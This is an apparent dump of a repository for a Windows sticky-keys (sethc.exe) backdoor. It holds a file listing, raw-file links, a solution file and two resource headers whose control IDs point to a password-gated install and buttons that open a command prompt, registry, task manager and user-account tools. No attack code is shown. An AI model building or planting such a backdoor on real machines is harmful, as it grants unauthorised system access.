├── PayLoad ├── PayLoad.aps ├── PayLoad.cpp ├── PayLoad.h ├── PayLoad.rc ├── PayLoad.vcproj ├── PayLoadDlg.cpp ├── PayLoadDlg.h ├── ReadMe.txt ├── res │ ├── PayLoad.ico │ ├── PayLoad.rc2 │ └── Sethc.exe ├── resource.h ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── README.md ├── Sethc.sln ├── Sethc.suo ├── Sethc ├── ReadMe.txt ├── Sethc.aps ├── Sethc.cpp ├── Sethc.h ├── Sethc.rc ├── Sethc.vcproj ├── SethcDlg.cpp ├── SethcDlg.h ├── SystemDlg.cpp ├── SystemDlg.h ├── res │ ├── Sethc.ico │ └── Sethc.rc2 ├── resource.h ├── stdafx.cpp ├── stdafx.h └── targetver.h └── Sethc使用指南.rar /PayLoad/PayLoad.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/PayLoad.aps -------------------------------------------------------------------------------- /PayLoad/PayLoad.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/PayLoad.cpp -------------------------------------------------------------------------------- /PayLoad/PayLoad.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/PayLoad.h -------------------------------------------------------------------------------- /PayLoad/PayLoad.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/PayLoad.rc -------------------------------------------------------------------------------- /PayLoad/PayLoad.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/PayLoad.vcproj -------------------------------------------------------------------------------- /PayLoad/PayLoadDlg.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/PayLoadDlg.cpp -------------------------------------------------------------------------------- /PayLoad/PayLoadDlg.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/PayLoadDlg.h -------------------------------------------------------------------------------- /PayLoad/ReadMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/ReadMe.txt -------------------------------------------------------------------------------- /PayLoad/res/PayLoad.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/res/PayLoad.ico -------------------------------------------------------------------------------- /PayLoad/res/PayLoad.rc2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/res/PayLoad.rc2 -------------------------------------------------------------------------------- /PayLoad/res/Sethc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/res/Sethc.exe -------------------------------------------------------------------------------- /PayLoad/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by PayLoad.rc 4 | // 5 | #define IDM_ABOUTBOX 0x0010 6 | #define IDD_ABOUTBOX 100 7 | #define IDS_ABOUTBOX 101 8 | #define IDD_PAYLOAD_DIALOG 102 9 | #define IDR_MAINFRAME 128 10 | #define IDR_EXE1 129 11 | #define IDR_SETHC 129 12 | #define IDC_EDIT_PASSWORD 1000 13 | #define IDC_BTN_CREATE 1001 14 | #define IDC_BTN_INSTALL 1002 15 | 16 | // Next default values for new objects 17 | // 18 | #ifdef APSTUDIO_INVOKED 19 | #ifndef APSTUDIO_READONLY_SYMBOLS 20 | #define _APS_NEXT_RESOURCE_VALUE 130 21 | #define _APS_NEXT_COMMAND_VALUE 32771 22 | #define _APS_NEXT_CONTROL_VALUE 1003 23 | #define _APS_NEXT_SYMED_VALUE 101 24 | #endif 25 | #endif 26 | -------------------------------------------------------------------------------- /PayLoad/stdafx.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/stdafx.cpp -------------------------------------------------------------------------------- /PayLoad/stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/stdafx.h -------------------------------------------------------------------------------- /PayLoad/targetver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/PayLoad/targetver.h -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/README.md -------------------------------------------------------------------------------- /Sethc.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual Studio 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Sethc", "Sethc\Sethc.vcproj", "{E5B796AE-5A5C-4BEF-B7B0-2CAB19EB810D}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PayLoad", "PayLoad\PayLoad.vcproj", "{65B695FD-F963-4B7B-A482-1DA18B54F768}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Release|Win32 = Release|Win32 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {E5B796AE-5A5C-4BEF-B7B0-2CAB19EB810D}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {E5B796AE-5A5C-4BEF-B7B0-2CAB19EB810D}.Debug|Win32.Build.0 = Debug|Win32 16 | {E5B796AE-5A5C-4BEF-B7B0-2CAB19EB810D}.Release|Win32.ActiveCfg = Release|Win32 17 | {E5B796AE-5A5C-4BEF-B7B0-2CAB19EB810D}.Release|Win32.Build.0 = Release|Win32 18 | {65B695FD-F963-4B7B-A482-1DA18B54F768}.Debug|Win32.ActiveCfg = Debug|Win32 19 | {65B695FD-F963-4B7B-A482-1DA18B54F768}.Debug|Win32.Build.0 = Debug|Win32 20 | {65B695FD-F963-4B7B-A482-1DA18B54F768}.Release|Win32.ActiveCfg = Release|Win32 21 | {65B695FD-F963-4B7B-A482-1DA18B54F768}.Release|Win32.Build.0 = Release|Win32 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /Sethc.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc.suo -------------------------------------------------------------------------------- /Sethc/ReadMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/ReadMe.txt -------------------------------------------------------------------------------- /Sethc/Sethc.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/Sethc.aps -------------------------------------------------------------------------------- /Sethc/Sethc.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/Sethc.cpp -------------------------------------------------------------------------------- /Sethc/Sethc.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/Sethc.h -------------------------------------------------------------------------------- /Sethc/Sethc.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/Sethc.rc -------------------------------------------------------------------------------- /Sethc/Sethc.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/Sethc.vcproj -------------------------------------------------------------------------------- /Sethc/SethcDlg.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/SethcDlg.cpp -------------------------------------------------------------------------------- /Sethc/SethcDlg.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/SethcDlg.h -------------------------------------------------------------------------------- /Sethc/SystemDlg.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/SystemDlg.cpp -------------------------------------------------------------------------------- /Sethc/SystemDlg.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/SystemDlg.h -------------------------------------------------------------------------------- /Sethc/res/Sethc.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/res/Sethc.ico -------------------------------------------------------------------------------- /Sethc/res/Sethc.rc2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/res/Sethc.rc2 -------------------------------------------------------------------------------- /Sethc/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Sethc.rc 4 | // 5 | #define IDD_SETHC_DIALOG 102 6 | #define IDR_MAINFRAME 128 7 | #define IDD_FUNCTION_DIALOG 129 8 | #define IDC_EDIT1 1000 9 | #define IDC_EDIT_PWD 1000 10 | #define IDC_EDIT_USERNAME 1000 11 | #define IDC_BTN_EXPLORER 1001 12 | #define IDC_BTN_CMD 1002 13 | #define IDC_BTN_REG 1003 14 | #define IDC_BTN_TASK 1004 15 | #define IDC_EDIT_PASSWORD 1005 16 | #define IDC_BTN_ADD 1006 17 | #define IDC_BTN_RESET 1008 18 | 19 | // Next default values for new objects 20 | // 21 | #ifdef APSTUDIO_INVOKED 22 | #ifndef APSTUDIO_READONLY_SYMBOLS 23 | #define _APS_NEXT_RESOURCE_VALUE 130 24 | #define _APS_NEXT_COMMAND_VALUE 32771 25 | #define _APS_NEXT_CONTROL_VALUE 1007 26 | #define _APS_NEXT_SYMED_VALUE 101 27 | #endif 28 | #endif 29 | -------------------------------------------------------------------------------- /Sethc/stdafx.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/stdafx.cpp -------------------------------------------------------------------------------- /Sethc/stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/stdafx.h -------------------------------------------------------------------------------- /Sethc/targetver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc/targetver.h -------------------------------------------------------------------------------- /Sethc使用指南.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blackye/Sethc_BackDoor/c322feafd54c004d33fb1b1fe5219054c07c74d3/Sethc使用指南.rar --------------------------------------------------------------------------------